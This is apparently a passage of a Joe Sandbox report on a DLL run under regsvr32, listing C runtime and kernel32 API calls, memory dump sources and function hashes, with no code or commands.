                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3535580693-0
                                                                                                                                      • Opcode ID: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                      • Instruction ID: d4843be39b8cae68b2789712342c625beff337df0ad15606b9ffb8856a49eaea
                                                                                                                                      • Opcode Fuzzy Hash: 851e935c27dd1964d5f09fdb64281df2a61b0302174b786e63cdd007473657bb
                                                                                                                                      • Instruction Fuzzy Hash: 4261A932F046428EE7609F21D84467867D2FB64BE4B5441B6DA1DA3BD4EFB8E8418B42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetStartupInfoA.KERNEL32 ref: 00007FFFE231377D
                                                                                                                                        • Part of subcall function 00007FFFE2313108: Sleep.KERNEL32(?,?,0000000A,00007FFFE2312DA3,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231314D
                                                                                                                                      • GetFileType.KERNEL32 ref: 00007FFFE23138FA
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileInfoSleepStartupType
                                                                                                                                      • String ID: @
                                                                                                                                      • API String ID: 1527402494-2766056989
                                                                                                                                      • Opcode ID: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                      • Instruction ID: cbadf41003565c24b6b34576a382192d9bf950f45b067ea13fc23b6a54a8c34c
                                                                                                                                      • Opcode Fuzzy Hash: be5b348199184886c2585225aa819b02cc7fe3bfefb3d916d7442fb5369bb0a2
                                                                                                                                      • Instruction Fuzzy Hash: 9091C122E1868289E7108B24D4443287BE5FB25B74F2547B6CA7D973D4EFBCE841CB12
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$_getptd
                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                      • API String ID: 3432092939-699404926
                                                                                                                                      • Opcode ID: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                      • Instruction ID: 7eaf113edbdb80a2ccf4de65b167bde244768d165cfd4f1ab705924932e6b443
                                                                                                                                      • Opcode Fuzzy Hash: 8efefd5caa40435472e3a9c676caa775b17fe32abe7b41ee90b269364e345ab9
                                                                                                                                      • Instruction Fuzzy Hash: 4471F622D0C6A28DF7B54A15941577B26D0AF64754F2941B7CE9EA22D2FEFCE8408F03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _FF_MSGBANNER.LIBCMT ref: 00007FFFE2316ADF
                                                                                                                                        • Part of subcall function 00007FFFE2316F0C: GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFFE2317194,?,?,?,?,00007FFFE2316C69,?,?,00000000,00007FFFE23130C0), ref: 00007FFFE2316FCF
                                                                                                                                        • Part of subcall function 00007FFFE231334C: ExitProcess.KERNEL32 ref: 00007FFFE231335B
                                                                                                                                        • Part of subcall function 00007FFFE231309C: Sleep.KERNEL32(?,?,00000000,00007FFFE2316B19,?,?,00000000,00007FFFE2316BC3,?,?,?,?,?,?,00000000,00007FFFE2312DC8), ref: 00007FFFE23130D2
                                                                                                                                      • _errno.LIBCMT ref: 00007FFFE2316B21
                                                                                                                                      • _lock.LIBCMT ref: 00007FFFE2316B35
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2316B57
                                                                                                                                      • _errno.LIBCMT ref: 00007FFFE2316B5C
                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FFFE2316BC3,?,?,?,?,?,?,00000000,00007FFFE2312DC8,?,?,?,00007FFFE2312DFF), ref: 00007FFFE2316B82
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$CriticalExitFileLeaveModuleNameProcessSectionSleep_lockfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1354249094-0
                                                                                                                                      • Opcode ID: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                      • Instruction ID: 5f10f2e039e2de2d227479e9f93b7e264dbb0ff5b7efc236db46c9c6ec8163ae
                                                                                                                                      • Opcode Fuzzy Hash: 281a6b99e1ceef077376b7d12b8049e3985eb177f8c0a9ab58ee7c303b441a02
                                                                                                                                      • Instruction Fuzzy Hash: A0218621E1C64249F6606B51945037963E4EFA4780F1490B2E64EE77C3EFFCE4418F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE2312D7A
                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE2312D88
                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE2312DE0
                                                                                                                                        • Part of subcall function 00007FFFE2313108: Sleep.KERNEL32(?,?,0000000A,00007FFFE2312DA3,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231314D
                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE2312DB4
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2312DD7
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00007FFFE2312DC8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3106088686-0
                                                                                                                                      • Opcode ID: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                      • Instruction ID: 4f6b525e770adb20979bd91b127cd42b6981fa36958b1e5fc8c51dfd441341a1
                                                                                                                                      • Opcode Fuzzy Hash: 1a58bbec3c0441b91cbee7445021737d92780d7df2029101222d8d22fa3fe0c2
                                                                                                                                      • Instruction Fuzzy Hash: 3F01B921E087468AFB345B21EC4473862D1BF98750B5481B5D92DA23C4FF7CE444CE12
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1012874770-0
                                                                                                                                      • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                      • Instruction ID: c27372493b54d12489863dd326e71810b1218422866f88ba62205497b14fe6f9
                                                                                                                                      • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                      • Instruction Fuzzy Hash: 3101A813E0C44299EE64DB61E55127463E2AFE8F00F5510B2D61EF6591EFEDF8808F62
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                      • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                      • Instruction ID: b5409c5ae3a0fed9445701daa8b7f1956dad059c8d63b72c3d521c23bfaf3419
                                                                                                                                      • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                      • Instruction Fuzzy Hash: 4FB19332F18B4589EB20DB62E4406EA77E0FBA9744F444572EA8E93785EFBCD105CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$Sleep_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2081351063-0
                                                                                                                                      • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                      • Instruction ID: 5dd336227f85548eff12bf4e8f1aeda592b247f38e75b5d440ba52e38e6e13f1
                                                                                                                                      • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                      • Instruction Fuzzy Hash: F3313221E0864249EB159B51C45137D77E1AF64FC4F5480B6DE0DA7397EEACE811CF42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFFE23173E5,?,?,?,?,00007FFFE23134D2,?,?,?,00007FFFE23121CB), ref: 00007FFFE23172FD
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFFE23173E5,?,?,?,?,00007FFFE23134D2,?,?,?,00007FFFE23121CB), ref: 00007FFFE231730C
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFFE23173E5,?,?,?,?,00007FFFE23134D2,?,?,?,00007FFFE23121CB), ref: 00007FFFE2317389
                                                                                                                                        • Part of subcall function 00007FFFE231318C: realloc.LIBCMT ref: 00007FFFE23131B7
                                                                                                                                        • Part of subcall function 00007FFFE231318C: Sleep.KERNEL32(?,?,00000000,00007FFFE2317379,?,?,?,00007FFFE23173E5,?,?,?,?,00007FFFE23134D2), ref: 00007FFFE23131D3
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFFE23173E5,?,?,?,?,00007FFFE23134D2,?,?,?,00007FFFE23121CB), ref: 00007FFFE2317398
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFFE23173E5,?,?,?,?,00007FFFE23134D2,?,?,?,00007FFFE23121CB), ref: 00007FFFE23173A4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1310268301-0
                                                                                                                                      • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                      • Instruction ID: 1de6e1ba6f4bae7a43593b57d944ef33e56970c8894f253692c96c738229cccb
                                                                                                                                      • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                      • Instruction Fuzzy Hash: 4A21C711F0965658EE10AB61E8442B9A2D1BB65BC0F4848B7DE0DA7785FFFCE045CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1310268301-0
                                                                                                                                      • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                      • Instruction ID: f57a45335c262b8152ea6bc8826fa7a0c373da270e532ec87a1eee5b3c9d4283
                                                                                                                                      • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                      • Instruction Fuzzy Hash: E9212511F096865CEE14EB11E5043B9A2E0ABA47C0F0844B2EE4DA7755FFBCE046CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFFE2313359,?,?,00000028,00007FFFE2316C7D,?,?,00000000,00007FFFE23130C0,?,?,00000000,00007FFFE2316B19), ref: 00007FFFE231331F
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,000000FF,00007FFFE2313359,?,?,00000028,00007FFFE2316C7D,?,?,00000000,00007FFFE23130C0,?,?,00000000,00007FFFE2316B19), ref: 00007FFFE2313334
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 1646373207-1276376045
                                                                                                                                      • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                      • Instruction ID: 208c5bf30724844f1a3e8fb82ed46a0887d5690a647c69b568798b33946fd649
                                                                                                                                      • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                      • Instruction Fuzzy Hash: 8FE0EC52F1960245EF295B50BC8433422D06FE8B10B4854B9C91FA63A4FFACEA98CA55
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFFE231309C: Sleep.KERNEL32(?,?,00000000,00007FFFE2316B19,?,?,00000000,00007FFFE2316BC3,?,?,?,?,?,?,00000000,00007FFFE2312DC8), ref: 00007FFFE23130D2
                                                                                                                                      • free.LIBCMT ref: 00007FFFE23158A5
                                                                                                                                      • free.LIBCMT ref: 00007FFFE23158C1
                                                                                                                                        • Part of subcall function 00007FFFE2316550: RtlCaptureContext.KERNEL32 ref: 00007FFFE231658F
                                                                                                                                        • Part of subcall function 00007FFFE2316550: IsDebuggerPresent.KERNEL32 ref: 00007FFFE231662D
                                                                                                                                        • Part of subcall function 00007FFFE2316550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFFE2316637
                                                                                                                                        • Part of subcall function 00007FFFE2316550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFFE2316642
                                                                                                                                        • Part of subcall function 00007FFFE2316550: GetCurrentProcess.KERNEL32 ref: 00007FFFE2316658
                                                                                                                                        • Part of subcall function 00007FFFE2316550: TerminateProcess.KERNEL32 ref: 00007FFFE2316666
                                                                                                                                      • free.LIBCMT ref: 00007FFFE23158D6
                                                                                                                                        • Part of subcall function 00007FFFE2313024: HeapFree.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231303A
                                                                                                                                        • Part of subcall function 00007FFFE2313024: _errno.LIBCMT ref: 00007FFFE2313044
                                                                                                                                        • Part of subcall function 00007FFFE2313024: GetLastError.KERNEL32(?,?,00000000,00007FFFE2312DDC,?,?,?,00007FFFE2312DFF,?,?,?,00007FFFE231254F,?,?,?,00007FFFE231262A), ref: 00007FFFE231304C
                                                                                                                                      • free.LIBCMT ref: 00007FFFE23158F5
                                                                                                                                      • free.LIBCMT ref: 00007FFFE2315911
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2294642566-0
                                                                                                                                      • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                      • Instruction ID: 339ebf4bc3d0b9a684fe00433608a44199ea8ffd6f6c69232606ab2b827750f6
                                                                                                                                      • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                      • Instruction Fuzzy Hash: 8F51B232F08A818AEB20DF19E81026D73E5FB94BA8F584176DE4D97744EE7CD846CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3186804695-0
                                                                                                                                      • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                      • Instruction ID: 52925ef7e942f38a04bbbcf9d49329f6c756c544d3732df9aacfc92a3ecec1b6
                                                                                                                                      • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                      • Instruction Fuzzy Hash: 5F818D72A096829ADB24CF25E5847AAB3E0FB54784F504236DB4D87B54EFBCE450CF01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lock$DecodePointer_errno_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4201827665-0
                                                                                                                                      • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                      • Instruction ID: 6513a34acc32c47eef21180e95d5b70e881c416b8da74dd72034e8f3b640d5eb
                                                                                                                                      • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                      • Instruction Fuzzy Hash: 93517131E096828AFB54DB65A84077A33D1FFA4784F2041B6D95DA3792EFBCE4418F02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$DecodePointercalloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1531210114-0
